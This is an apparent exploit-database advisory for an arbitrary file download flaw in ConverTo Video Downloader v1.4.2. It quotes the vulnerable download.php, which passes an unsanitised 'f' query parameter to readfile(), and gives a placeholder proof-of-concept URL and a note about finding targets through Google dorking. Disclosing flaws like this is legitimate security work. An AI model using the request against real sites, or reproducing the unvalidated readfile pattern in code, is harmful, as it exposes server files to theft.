Share
## https://sploitus.com/exploit?id=PACKETSTORM:173898
====================================================================================================================================  
| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) |  
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] infected file :download.php   
  
[+] line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);  
  
<?php   
if(isset($_GET['f'])){  
  
$siz = convertToBytes($_GET['sz']);  
$file = urldecode($_GET['f']);  
$rand = rand(0,5000);  
header("Content-Description: File Transfer");   
header("Content-Type: application/octet-stream");   
header('Content-Length: ' . $siz);  
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");   
ob_clean(); flush();  
readfile ($file);   
  
}  
  
[+] http://localhost/[PATH]/download.php?f= Ev!l  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================